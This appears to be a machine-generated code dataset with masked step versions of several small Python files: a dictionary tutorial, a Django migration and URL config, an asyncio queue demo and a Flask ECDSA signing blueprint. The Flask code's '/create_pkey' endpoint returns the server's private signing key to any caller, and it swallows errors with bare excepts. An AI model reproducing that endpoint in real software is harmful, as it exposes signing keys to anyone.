5}\r\nd.update(d2)\r\nprint(d)\r\nprint(d.pop('muffin'))\r\nprint(d.pop('toast'))\r\nprint(d)\r\n\r\ntable = {\r\n '1975': 'Holy Grail',\r\n '1979': 'Life of Brain',\r\n '1983': 'The Meaning of Life'\r\n}\r\nyear = '1983'\r\nmovie = table[year]\r\nprint(movie)\r\n\r\nfor year in table:\r\n print(year + '\\t' + table[year])\r\n\r\ntable2 = {\r\n 'Holy Grail': '1975',\r\n 'Life of Brain': '1979',\r\n 'The Meaning of Life': '1983'\r\n}\r\nprint(table2['Holy Grail'])\r\nprint(list(table2.items()))\r\n\r\nyear_ = [title for (title, year) in table2.items() if year == '1975']\r\nprint(year_)\r\n\r\nK = 'Holy Grail'\r\nprint(table2[K])\r\nV = '1975'\r\nkey = [key for (key, value) in table2.items() if value == V]\r\nprint(key)\r\nkey = [key for key in table2.keys() if table2[key] == V]\r\nprint(key)\r\n\r\nMatrix = {}\r\nMatrix[(2, 3, 4)] = 88\r\nMatrix[(7, 8, 9)] = 99\r\nX = 2\r\nY = 3\r\nZ = 4\r\nz_ = Matrix[(X, Y, Z)]\r\nprint(z_)\r\nprint(Matrix)\r\n\r\nif (2, 3, 6) in Matrix:\r\n print(Matrix[(2, 3, 6)])\r\nelse:\r\n print(0)\r\n\r\ntry:\r\n print(Matrix[(2, 3, 6)])\r\nexcept KeyError:\r\n print(0)\r\n\r\nprint(Matrix.get((2, 3, 4), 0))\r\nprint(Matrix.get((2, 3, 6), 0))\r\n\r\nrec = {}\r\nrec['name'] = 'Bob'\r\nrec['age'] = 40.5\r\nrec['job'] = 'developer/manager'\r\nprint(rec['name'])\r\n\r\nrec = {\r\n 'name': 'Bob',\r\n 'jobs': ['developer', 'manager'],\r\n 'web': 'www.bobs.org/?Bob',\r\n 'home': {'state': 'Overworked', 'zip': 12345}\r\n}\r\nprint(rec['name'])\r\nprint(rec['jobs'])\r\nprint(rec['jobs'][1])\r\nprint(rec['home']['zip'])\r\ndb = []\r\nother = {\r\n 'name': 'other',\r\n 'jobs': ['hr', 'manager'],\r\n 'web': 'www.hr.org',\r\n 'home': {'state': 'Overworked', 'zip': 55555}\r\n}\r\ndb.append(rec)\r\ndb.append(other)\r\nprint(db[0]['jobs'])\r\n\r\ndb = {}\r\ndb['bob'] = rec\r\ndb['sue'] = other\r\ndb['bob']['jobs']\r\n\r\nage_ = {'name': 'Bob', 'age': 40}\r\nprint(age_)\r\n\r\nd = {}\r\nd['name'] = 'sue'\r\nd['age'] = 50\r\nprint(d)\r\n\r\ndi = dict(name='Bob', age=56)\r\nprint(di)\r\n\r\ndi = dict([('name', 'Bob'), ('age', 55)])\r\nprint(di)\r\n\r\nfromkeys = dict.fromkeys(['a', 'b'], 0)\r\nprint(fromkeys)\r\n\r\niterator = zip(['a', 'b', 'c'], [1, 2, 3])\r\nprint(iterator)\r\nd = dict(zip(['a', 'b', 'c'], [1, 2, 3]))\r\nprint(d)\r\n\r\nd = {k: v for (k, v) in zip(['a', 'b', 'c'], [1, 2, 3])}\r\nprint(d)\r\n\r\nd = {x: x ** 2 for x in [1, 2, 3, 4]}\r\nprint(d)\r\nd2 = {x: x ** 2 for x in range(4)}\r\nprint(d2)\r\n\r\nd = {c: c * 4 for c in 'SPAM'}\r\nprint(d)\r\n\r\nd = {c.lower(): c + '!' for c in ['spam', 'eggs', 'ham']}\r\nprint(d)\r\n\r\nd = dict.fromkeys(['a', 'b', 'c'], 0)\r\nprint(d)\r\n\r\nd = {k: 0 for k in ['a', 'b', 'c']}\r\nprint(d)\r\n\r\nd = dict.fromkeys('spam')\r\nprint(d)\r\nd = dict.fromkeys('spam', 0)\r\nprint(d)\r\n\r\nd = {k: None for k in 'spam'}\r\nprint(d)\r\n\r\nd = dict(a=1, b=2, c=3)\r\nprint(d)\r\nk = d.keys()\r\nprint(k)\r\n# print(k[0])\r\nprint(list(k)[0])\r\nv = d.values()\r\nprint(v)\r\nprint(list(v))\r\nprint(d.items())\r\nprint(list(d.items()))\r\n\r\nfor k in d.keys(): print(k)\r\n\r\nfor key in d: print(key)\r\n\r\n# 排序{'a': 1, 'b': 2, 'c': 3}\r\nprint(d)\r\nKs = d.keys()\r\nprint(Ks)\r\nKs = list(Ks)\r\nKs.sort()\r\nprint(Ks)\r\nfor k in Ks: print(k, d[k])\r\n\r\nprint(\"-------\"*6)\r\nD = {'b': 2, 'c': 3, 'a': 1}\r\nKs = D.keys()\r\nfor k in sorted(Ks): print(k, D[k])\r\n",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
dependencies = [('products', '0007_auto_20150904_1320')]
operations = [migrations.AddField(model_name='customer', name=
'in_close', field=models.BooleanField(default=False)), migrations.
AddField(model_name='customer', name='time_close', field=models.
DateTimeField(default=datetime.datetime(2015, 11, 26, 23, 25, 34,
205639))), migrations.AddField(model_name='historicalcustomer',
name='in_close', field=models.BooleanField(default=False)),
migrations.AddField(model_name='historicalcustomer', name=
'time_close', field=models.DateTimeField(default=datetime.datetime(
2015, 11, 26, 23, 25, 34, 205639)))]
<|reserved_special_token_1|>
from __future__ import unicode_literals
from django.db import models, migrations
import datetime
class Migration(migrations.Migration):
dependencies = [('products', '0007_auto_20150904_1320')]
operations = [migrations.AddField(model_name='customer', name=
'in_close', field=models.BooleanField(default=False)), migrations.
AddField(model_name='customer', name='time_close', field=models.
DateTimeField(default=datetime.datetime(2015, 11, 26, 23, 25, 34,
205639))), migrations.AddField(model_name='historicalcustomer',
name='in_close', field=models.BooleanField(default=False)),
migrations.AddField(model_name='historicalcustomer', name=
'time_close', field=models.DateTimeField(default=datetime.datetime(
2015, 11, 26, 23, 25, 34, 205639)))]
<|reserved_special_token_1|>
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import datetime
class Migration(migrations.Migration):
dependencies = [
('products', '0007_auto_20150904_1320'),
]
operations = [
migrations.AddField(
model_name='customer',
name='in_close',
field=models.BooleanField(default=False),
),
migrations.AddField(
model_name='customer',
name='time_close',
field=models.DateTimeField(default=datetime.datetime(2015, 11, 26, 23, 25, 34, 205639)),
),
migrations.AddField(
model_name='historicalcustomer',
name='in_close',
field=models.BooleanField(default=False),
),
migrations.AddField(
model_name='historicalcustomer',
name='time_close',
field=models.DateTimeField(default=datetime.datetime(2015, 11, 26, 23, 25, 34, 205639)),
),
]
|
flexible
|
{
"blob_id": "fd52379d125d6215fe12b6e01aa568949511549d",
"index": 6964,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('products', '0007_auto_20150904_1320')]\n operations = [migrations.AddField(model_name='customer', name=\n 'in_close', field=models.BooleanField(default=False)), migrations.\n AddField(model_name='customer', name='time_close', field=models.\n DateTimeField(default=datetime.datetime(2015, 11, 26, 23, 25, 34, \n 205639))), migrations.AddField(model_name='historicalcustomer',\n name='in_close', field=models.BooleanField(default=False)),\n migrations.AddField(model_name='historicalcustomer', name=\n 'time_close', field=models.DateTimeField(default=datetime.datetime(\n 2015, 11, 26, 23, 25, 34, 205639)))]\n",
"step-4": "from __future__ import unicode_literals\nfrom django.db import models, migrations\nimport datetime\n\n\nclass Migration(migrations.Migration):\n dependencies = [('products', '0007_auto_20150904_1320')]\n operations = [migrations.AddField(model_name='customer', name=\n 'in_close', field=models.BooleanField(default=False)), migrations.\n AddField(model_name='customer', name='time_close', field=models.\n DateTimeField(default=datetime.datetime(2015, 11, 26, 23, 25, 34, \n 205639))), migrations.AddField(model_name='historicalcustomer',\n name='in_close', field=models.BooleanField(default=False)),\n migrations.AddField(model_name='historicalcustomer', name=\n 'time_close', field=models.DateTimeField(default=datetime.datetime(\n 2015, 11, 26, 23, 25, 34, 205639)))]\n",
"step-5": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('products', '0007_auto_20150904_1320'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='customer',\n name='in_close',\n field=models.BooleanField(default=False),\n ),\n migrations.AddField(\n model_name='customer',\n name='time_close',\n field=models.DateTimeField(default=datetime.datetime(2015, 11, 26, 23, 25, 34, 205639)),\n ),\n migrations.AddField(\n model_name='historicalcustomer',\n name='in_close',\n field=models.BooleanField(default=False),\n ),\n migrations.AddField(\n model_name='historicalcustomer',\n name='time_close',\n field=models.DateTimeField(default=datetime.datetime(2015, 11, 26, 23, 25, 34, 205639)),\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
__version__ = 'alph 1.0'
<|reserved_special_token_1|>
__version__ = "alph 1.0"
|
flexible
|
{
"blob_id": "2c4eb07a32c6903ae31006f42c13c55e6cc42eb5",
"index": 5245,
"step-1": "<mask token>\n",
"step-2": "__version__ = 'alph 1.0'\n",
"step-3": "__version__ = \"alph 1.0\"\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^stats/$', views.get_stats, name='stats'),
url(r'^follow/me/$', views.follow_me, name='follow_me'),
url(r'^follower/confirm/$', views.confirm_follower, name='follower_confirm'),
url(r'^execute/', views.execute, name='executed'),
url(r'^output/', views.update_output, name='output'),
url(r'^lead/', views.lead_nodes, name='lead'),
]
|
normal
|
{
"blob_id": "33b68246dd3da9561c1d4adb5a3403cba656dcee",
"index": 9175,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nurlpatterns = [url('^stats/$', views.get_stats, name='stats'), url(\n '^follow/me/$', views.follow_me, name='follow_me'), url(\n '^follower/confirm/$', views.confirm_follower, name='follower_confirm'),\n url('^execute/', views.execute, name='executed'), url('^output/', views\n .update_output, name='output'), url('^lead/', views.lead_nodes, name=\n 'lead')]\n",
"step-3": "from django.conf.urls import url\nfrom . import views\nurlpatterns = [url('^stats/$', views.get_stats, name='stats'), url(\n '^follow/me/$', views.follow_me, name='follow_me'), url(\n '^follower/confirm/$', views.confirm_follower, name='follower_confirm'),\n url('^execute/', views.execute, name='executed'), url('^output/', views\n .update_output, name='output'), url('^lead/', views.lead_nodes, name=\n 'lead')]\n",
"step-4": "from django.conf.urls import url\n\nfrom . import views\n\nurlpatterns = [\n url(r'^stats/$', views.get_stats, name='stats'),\n url(r'^follow/me/$', views.follow_me, name='follow_me'),\n url(r'^follower/confirm/$', views.confirm_follower, name='follower_confirm'),\n url(r'^execute/', views.execute, name='executed'),\n url(r'^output/', views.update_output, name='output'),\n url(r'^lead/', views.lead_nodes, name='lead'),\n\n\n]\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
async def consumer(queue, name):
while True:
val = await queue.get()
print(f"{name} get a val: {val} at {time.strftime('%X')}")
await asyncio.sleep(1)
async def producer(queue, name):
for i in range(20):
await queue.put(i)
print(f'{name} put a val: {i}')
await asyncio.sleep(0.1)
async def main():
queue = asyncio.Queue()
tasks = [asyncio.create_task(producer(queue, 'producer'))]
for i in range(3):
tasks.append(asyncio.create_task(consumer(queue, f'consumer_{i}')))
await asyncio.gather(*tasks, return_exceptions=True)
asyncio.run(main())
<|reserved_special_token_1|>
import time
import random
import asyncio
async def consumer(queue, name):
while True:
val = await queue.get()
print(f"{name} get a val: {val} at {time.strftime('%X')}")
await asyncio.sleep(1)
async def producer(queue, name):
for i in range(20):
await queue.put(i)
print(f'{name} put a val: {i}')
await asyncio.sleep(0.1)
async def main():
queue = asyncio.Queue()
tasks = [asyncio.create_task(producer(queue, 'producer'))]
for i in range(3):
tasks.append(asyncio.create_task(consumer(queue, f'consumer_{i}')))
await asyncio.gather(*tasks, return_exceptions=True)
asyncio.run(main())
<|reserved_special_token_1|>
#!usr/bin/python
# -*- coding:utf8 -*-
import time
import random
import asyncio
async def consumer(queue, name):
while True:
val = await queue.get()
print(f'{name} get a val: {val} at {time.strftime("%X")}')
await asyncio.sleep(1)
async def producer(queue, name):
for i in range(20):
await queue.put(i)
print(f'{name} put a val: {i}')
await asyncio.sleep(0.1)
async def main():
queue = asyncio.Queue()
tasks = [asyncio.create_task(producer(queue, 'producer'))]
for i in range(3):
tasks.append(asyncio.create_task(consumer(queue, f'consumer_{i}')))
# await asyncio.sleep(10)
await asyncio.gather(*tasks, return_exceptions=True)
# start = time.perf_counter()
asyncio.run(main())
# end = time.perf_counter()
# print(end - start)
|
flexible
|
{
"blob_id": "e1172e2d9f20e56241829b3e4ccb4bcf6b5440be",
"index": 9233,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nasync def consumer(queue, name):\n while True:\n val = await queue.get()\n print(f\"{name} get a val: {val} at {time.strftime('%X')}\")\n await asyncio.sleep(1)\n\n\nasync def producer(queue, name):\n for i in range(20):\n await queue.put(i)\n print(f'{name} put a val: {i}')\n await asyncio.sleep(0.1)\n\n\nasync def main():\n queue = asyncio.Queue()\n tasks = [asyncio.create_task(producer(queue, 'producer'))]\n for i in range(3):\n tasks.append(asyncio.create_task(consumer(queue, f'consumer_{i}')))\n await asyncio.gather(*tasks, return_exceptions=True)\n\n\nasyncio.run(main())\n",
"step-3": "import time\nimport random\nimport asyncio\n\n\nasync def consumer(queue, name):\n while True:\n val = await queue.get()\n print(f\"{name} get a val: {val} at {time.strftime('%X')}\")\n await asyncio.sleep(1)\n\n\nasync def producer(queue, name):\n for i in range(20):\n await queue.put(i)\n print(f'{name} put a val: {i}')\n await asyncio.sleep(0.1)\n\n\nasync def main():\n queue = asyncio.Queue()\n tasks = [asyncio.create_task(producer(queue, 'producer'))]\n for i in range(3):\n tasks.append(asyncio.create_task(consumer(queue, f'consumer_{i}')))\n await asyncio.gather(*tasks, return_exceptions=True)\n\n\nasyncio.run(main())\n",
"step-4": "#!usr/bin/python\n# -*- coding:utf8 -*-\nimport time\nimport random\nimport asyncio\n\n\nasync def consumer(queue, name):\n while True:\n val = await queue.get()\n print(f'{name} get a val: {val} at {time.strftime(\"%X\")}')\n await asyncio.sleep(1)\n\n\nasync def producer(queue, name):\n for i in range(20):\n await queue.put(i)\n print(f'{name} put a val: {i}')\n await asyncio.sleep(0.1)\n\n\nasync def main():\n queue = asyncio.Queue()\n\n tasks = [asyncio.create_task(producer(queue, 'producer'))]\n for i in range(3):\n tasks.append(asyncio.create_task(consumer(queue, f'consumer_{i}')))\n\n # await asyncio.sleep(10)\n\n await asyncio.gather(*tasks, return_exceptions=True)\n\n\n# start = time.perf_counter()\nasyncio.run(main())\n# end = time.perf_counter()\n# print(end - start)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
@ecdsa_app.get('/create_pkey')
def private_key():
return {'status': 'success', 'result': sk.to_string().hex()}
@ecdsa_app.post('/op')
def check_op():
input = request.get_json()
operators = ['+', '-', '*', '/', '**', '//', '%']
finaloutput = {}
if input['data']['op'] in operators:
finaloutput['status'] = 'success'
finaloutput['message'] = 'successfully verified'
finaloutput['result'] = str(input['data'])
else:
finaloutput['status'] = 'failure'
finaloutput['message'] = 'invalid operator'
return finaloutput
<|reserved_special_token_0|>
@ecdsa_app.post('/verify')
def verify_fun():
data = request.get_json()
output = check_operator_verify(data)
finaloutput = {}
if output:
finaloutput['status'] = 'success'
finaloutput['message'] = 'successfully verified'
else:
finaloutput['status'] = 'failure'
finaloutput['message'] = 'invalid operator or signature is invalid'
return finaloutput
def check_operator_verify(input):
try:
operators = ['+', '-', '*', '/', '**', '//', '%']
if input['data']['op'] in operators:
token = f.encrypt(str(input['data']).encode())
reverse_signature = bytes.fromhex(input['signature'])
return vk.verify(reverse_signature, token)
except:
pass
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@ecdsa_app.get('/create_pkey')
def private_key():
return {'status': 'success', 'result': sk.to_string().hex()}
@ecdsa_app.post('/op')
def check_op():
input = request.get_json()
operators = ['+', '-', '*', '/', '**', '//', '%']
finaloutput = {}
if input['data']['op'] in operators:
finaloutput['status'] = 'success'
finaloutput['message'] = 'successfully verified'
finaloutput['result'] = str(input['data'])
else:
finaloutput['status'] = 'failure'
finaloutput['message'] = 'invalid operator'
return finaloutput
@ecdsa_app.post('/verify_signature')
def signature_verify():
input = request.get_json()
token = f.encrypt(str(input['data']).encode())
signature_ = sk.sign(token)
finaloutput = {}
try:
if vk.verify(signature_, token):
finaloutput['status'] = 'success'
finaloutput['message'] = 'successfully verified'
except:
finaloutput['status'] = 'failure'
finaloutput['message'] = 'signature is invalid'
return finaloutput
@ecdsa_app.post('/verify')
def verify_fun():
data = request.get_json()
output = check_operator_verify(data)
finaloutput = {}
if output:
finaloutput['status'] = 'success'
finaloutput['message'] = 'successfully verified'
else:
finaloutput['status'] = 'failure'
finaloutput['message'] = 'invalid operator or signature is invalid'
return finaloutput
def check_operator_verify(input):
try:
operators = ['+', '-', '*', '/', '**', '//', '%']
if input['data']['op'] in operators:
token = f.encrypt(str(input['data']).encode())
reverse_signature = bytes.fromhex(input['signature'])
return vk.verify(reverse_signature, token)
except:
pass
<|reserved_special_token_1|>
<|reserved_special_token_0|>
ecdsa_app = Blueprint('ecdsa_app', __name__, url_prefix='/ecdsa_app')
f = Fernet(Fernet.generate_key())
sk = SigningKey.generate(curve=NIST384p)
vk = sk.get_verifying_key()
@ecdsa_app.get('/create_pkey')
def private_key():
return {'status': 'success', 'result': sk.to_string().hex()}
@ecdsa_app.post('/op')
def check_op():
input = request.get_json()
operators = ['+', '-', '*', '/', '**', '//', '%']
finaloutput = {}
if input['data']['op'] in operators:
finaloutput['status'] = 'success'
finaloutput['message'] = 'successfully verified'
finaloutput['result'] = str(input['data'])
else:
finaloutput['status'] = 'failure'
finaloutput['message'] = 'invalid operator'
return finaloutput
@ecdsa_app.post('/verify_signature')
def signature_verify():
input = request.get_json()
token = f.encrypt(str(input['data']).encode())
signature_ = sk.sign(token)
finaloutput = {}
try:
if vk.verify(signature_, token):
finaloutput['status'] = 'success'
finaloutput['message'] = 'successfully verified'
except:
finaloutput['status'] = 'failure'
finaloutput['message'] = 'signature is invalid'
return finaloutput
@ecdsa_app.post('/verify')
def verify_fun():
data = request.get_json()
output = check_operator_verify(data)
finaloutput = {}
if output:
finaloutput['status'] = 'success'
finaloutput['message'] = 'successfully verified'
else:
finaloutput['status'] = 'failure'
finaloutput['message'] = 'invalid operator or signature is invalid'
return finaloutput
def check_operator_verify(input):
try:
operators = ['+', '-', '*', '/', '**', '//', '%']
if input['data']['op'] in operators:
token = f.encrypt(str(input['data']).encode())
reverse_signature = bytes.fromhex(input['signature'])
return vk.verify(reverse_signature, token)
except:
pass
<|reserved_special_token_1|>
from flask import Blueprint, request
from ecdsa import SigningKey, NIST384p
import base64, codecs
from cryptography.fernet import Fernet
ecdsa_app = Blueprint('ecdsa_app', __name__, url_prefix='/ecdsa_app')
f = Fernet(Fernet.generate_key())
sk = SigningKey.generate(curve=NIST384p)
vk = sk.get_verifying_key()
@ecdsa_app.get('/create_pkey')
def private_key():
return {'status': 'success', 'result': sk.to_string().hex()}
@ecdsa_app.post('/op')
def check_op():
input = request.get_json()
operators = ['+', '-', '*', '/', '**', '//', '%']
finaloutput = {}
if input['data']['op'] in operators:
finaloutput['status'] = 'success'
finaloutput['message'] = 'successfully verified'
finaloutput['result'] = str(input['data'])
else:
finaloutput['status'] = 'failure'
finaloutput['message'] = 'invalid operator'
return finaloutput
@ecdsa_app.post('/verify_signature')
def signature_verify():
input = request.get_json()
token = f.encrypt(str(input['data']).encode())
signature_ = sk.sign(token)
finaloutput = {}
try:
if vk.verify(signature_, token):
finaloutput['status'] = 'success'
finaloutput['message'] = 'successfully verified'
except:
finaloutput['status'] = 'failure'
finaloutput['message'] = 'signature is invalid'
return finaloutput
@ecdsa_app.post('/verify')
def verify_fun():
data = request.get_json()
output = check_operator_verify(data)
finaloutput = {}
if output:
finaloutput['status'] = 'success'
finaloutput['message'] = 'successfully verified'
else:
finaloutput['status'] = 'failure'
finaloutput['message'] = 'invalid operator or signature is invalid'
return finaloutput
def check_operator_verify(input):
try:
operators = ['+', '-', '*', '/', '**', '//', '%']
if input['data']['op'] in operators:
token = f.encrypt(str(input['data']).encode())
reverse_signature = bytes.fromhex(input['signature'])
return vk.verify(reverse_signature, token)
except:
pass
<|reserved_special_token_1|>
from flask import Blueprint, request
from ecdsa import SigningKey, NIST384p
import base64, codecs
from cryptography.fernet import Fernet
ecdsa_app = Blueprint('ecdsa_app', __name__, url_prefix='/ecdsa_app')
f = Fernet(Fernet.generate_key())
sk = SigningKey.generate(curve=NIST384p)
vk = sk.get_verifying_key()
@ecdsa_app.get('/create_pkey')
def private_key():
#reverse = bytes.fromhex(sk.to_string().hex())
return {"status":"success", "result":sk.to_string().hex()}
@ecdsa_app.post('/op')
def check_op():
input = request.get_json()
operators = ['+', '-', '*', '/', '**', '//', '%']
finaloutput = {}
if input['data']['op'] in operators:
finaloutput['status'] = 'success'
finaloutput['message'] = 'successfully verified'
finaloutput['result'] = str(input['data'])
else:
finaloutput['status'] = 'failure'
finaloutput['message'] = 'invalid operator'
return finaloutput
@ecdsa_app.post('/verify_signature')
def signature_verify():
input = request.get_json()
token = f.encrypt(str(input['data']).encode())
#reverse_signature = bytes.fromhex(input["signature"])
signature_ = sk.sign(token)
finaloutput = {}
try:
if (vk.verify(signature_, token)):
finaloutput['status'] = 'success'
finaloutput['message'] = 'successfully verified'
except:
finaloutput['status'] = 'failure'
finaloutput['message'] = 'signature is invalid'
return finaloutput
@ecdsa_app.post('/verify')
def verify_fun():
data = request.get_json()
output = check_operator_verify(data)
finaloutput ={}
if output:
finaloutput['status'] = 'success'
finaloutput['message'] = 'successfully verified'
else:
finaloutput['status'] = 'failure'
finaloutput['message'] = 'invalid operator or signature is invalid'
return finaloutput
def check_operator_verify(input):
try:
operators = ['+', '-', '*', '/', '**', '//', '%']
if input['data']['op'] in operators:
token = f.encrypt(str(input['data']).encode())
reverse_signature = bytes.fromhex(input["signature"])
return (vk.verify(reverse_signature, token))
except:
pass
|
flexible
|
{
"blob_id": "4eb7abb24451f3f895d0731de7b29a85d90c1539",
"index": 8246,
"step-1": "<mask token>\n\n\n@ecdsa_app.get('/create_pkey')\ndef private_key():\n return {'status': 'success', 'result': sk.to_string().hex()}\n\n\n@ecdsa_app.post('/op')\ndef check_op():\n input = request.get_json()\n operators = ['+', '-', '*', '/', '**', '//', '%']\n finaloutput = {}\n if input['data']['op'] in operators:\n finaloutput['status'] = 'success'\n finaloutput['message'] = 'successfully verified'\n finaloutput['result'] = str(input['data'])\n else:\n finaloutput['status'] = 'failure'\n finaloutput['message'] = 'invalid operator'\n return finaloutput\n\n\n<mask token>\n\n\n@ecdsa_app.post('/verify')\ndef verify_fun():\n data = request.get_json()\n output = check_operator_verify(data)\n finaloutput = {}\n if output:\n finaloutput['status'] = 'success'\n finaloutput['message'] = 'successfully verified'\n else:\n finaloutput['status'] = 'failure'\n finaloutput['message'] = 'invalid operator or signature is invalid'\n return finaloutput\n\n\ndef check_operator_verify(input):\n try:\n operators = ['+', '-', '*', '/', '**', '//', '%']\n if input['data']['op'] in operators:\n token = f.encrypt(str(input['data']).encode())\n reverse_signature = bytes.fromhex(input['signature'])\n return vk.verify(reverse_signature, token)\n except:\n pass\n",
"step-2": "<mask token>\n\n\n@ecdsa_app.get('/create_pkey')\ndef private_key():\n return {'status': 'success', 'result': sk.to_string().hex()}\n\n\n@ecdsa_app.post('/op')\ndef check_op():\n input = request.get_json()\n operators = ['+', '-', '*', '/', '**', '//', '%']\n finaloutput = {}\n if input['data']['op'] in operators:\n finaloutput['status'] = 'success'\n finaloutput['message'] = 'successfully verified'\n finaloutput['result'] = str(input['data'])\n else:\n finaloutput['status'] = 'failure'\n finaloutput['message'] = 'invalid operator'\n return finaloutput\n\n\n@ecdsa_app.post('/verify_signature')\ndef signature_verify():\n input = request.get_json()\n token = f.encrypt(str(input['data']).encode())\n signature_ = sk.sign(token)\n finaloutput = {}\n try:\n if vk.verify(signature_, token):\n finaloutput['status'] = 'success'\n finaloutput['message'] = 'successfully verified'\n except:\n finaloutput['status'] = 'failure'\n finaloutput['message'] = 'signature is invalid'\n return finaloutput\n\n\n@ecdsa_app.post('/verify')\ndef verify_fun():\n data = request.get_json()\n output = check_operator_verify(data)\n finaloutput = {}\n if output:\n finaloutput['status'] = 'success'\n finaloutput['message'] = 'successfully verified'\n else:\n finaloutput['status'] = 'failure'\n finaloutput['message'] = 'invalid operator or signature is invalid'\n return finaloutput\n\n\ndef check_operator_verify(input):\n try:\n operators = ['+', '-', '*', '/', '**', '//', '%']\n if input['data']['op'] in operators:\n token = f.encrypt(str(input['data']).encode())\n reverse_signature = bytes.fromhex(input['signature'])\n return vk.verify(reverse_signature, token)\n except:\n pass\n",
"step-3": "<mask token>\necdsa_app = Blueprint('ecdsa_app', __name__, url_prefix='/ecdsa_app')\nf = Fernet(Fernet.generate_key())\nsk = SigningKey.generate(curve=NIST384p)\nvk = sk.get_verifying_key()\n\n\n@ecdsa_app.get('/create_pkey')\ndef private_key():\n return {'status': 'success', 'result': sk.to_string().hex()}\n\n\n@ecdsa_app.post('/op')\ndef check_op():\n input = request.get_json()\n operators = ['+', '-', '*', '/', '**', '//', '%']\n finaloutput = {}\n if input['data']['op'] in operators:\n finaloutput['status'] = 'success'\n finaloutput['message'] = 'successfully verified'\n finaloutput['result'] = str(input['data'])\n else:\n finaloutput['status'] = 'failure'\n finaloutput['message'] = 'invalid operator'\n return finaloutput\n\n\n@ecdsa_app.post('/verify_signature')\ndef signature_verify():\n input = request.get_json()\n token = f.encrypt(str(input['data']).encode())\n signature_ = sk.sign(token)\n finaloutput = {}\n try:\n if vk.verify(signature_, token):\n finaloutput['status'] = 'success'\n finaloutput['message'] = 'successfully verified'\n except:\n finaloutput['status'] = 'failure'\n finaloutput['message'] = 'signature is invalid'\n return finaloutput\n\n\n@ecdsa_app.post('/verify')\ndef verify_fun():\n data = request.get_json()\n output = check_operator_verify(data)\n finaloutput = {}\n if output:\n finaloutput['status'] = 'success'\n finaloutput['message'] = 'successfully verified'\n else:\n finaloutput['status'] = 'failure'\n finaloutput['message'] = 'invalid operator or signature is invalid'\n return finaloutput\n\n\ndef check_operator_verify(input):\n try:\n operators = ['+', '-', '*', '/', '**', '//', '%']\n if input['data']['op'] in operators:\n token = f.encrypt(str(input['data']).encode())\n reverse_signature = bytes.fromhex(input['signature'])\n return vk.verify(reverse_signature, token)\n except:\n pass\n",
"step-4": "from flask import Blueprint, request\nfrom ecdsa import SigningKey, NIST384p\nimport base64, codecs\nfrom cryptography.fernet import Fernet\necdsa_app = Blueprint('ecdsa_app', __name__, url_prefix='/ecdsa_app')\nf = Fernet(Fernet.generate_key())\nsk = SigningKey.generate(curve=NIST384p)\nvk = sk.get_verifying_key()\n\n\n@ecdsa_app.get('/create_pkey')\ndef private_key():\n return {'status': 'success', 'result': sk.to_string().hex()}\n\n\n@ecdsa_app.post('/op')\ndef check_op():\n input = request.get_json()\n operators = ['+', '-', '*', '/', '**', '//', '%']\n finaloutput = {}\n if input['data']['op'] in operators:\n finaloutput['status'] = 'success'\n finaloutput['message'] = 'successfully verified'\n finaloutput['result'] = str(input['data'])\n else:\n finaloutput['status'] = 'failure'\n finaloutput['message'] = 'invalid operator'\n return finaloutput\n\n\n@ecdsa_app.post('/verify_signature')\ndef signature_verify():\n input = request.get_json()\n token = f.encrypt(str(input['data']).encode())\n signature_ = sk.sign(token)\n finaloutput = {}\n try:\n if vk.verify(signature_, token):\n finaloutput['status'] = 'success'\n finaloutput['message'] = 'successfully verified'\n except:\n finaloutput['status'] = 'failure'\n finaloutput['message'] = 'signature is invalid'\n return finaloutput\n\n\n@ecdsa_app.post('/verify')\ndef verify_fun():\n data = request.get_json()\n output = check_operator_verify(data)\n finaloutput = {}\n if output:\n finaloutput['status'] = 'success'\n finaloutput['message'] = 'successfully verified'\n else:\n finaloutput['status'] = 'failure'\n finaloutput['message'] = 'invalid operator or signature is invalid'\n return finaloutput\n\n\ndef check_operator_verify(input):\n try:\n operators = ['+', '-', '*', '/', '**', '//', '%']\n if input['data']['op'] in operators:\n token = f.encrypt(str(input['data']).encode())\n reverse_signature = bytes.fromhex(input['signature'])\n return vk.verify(reverse_signature, token)\n except:\n pass\n",
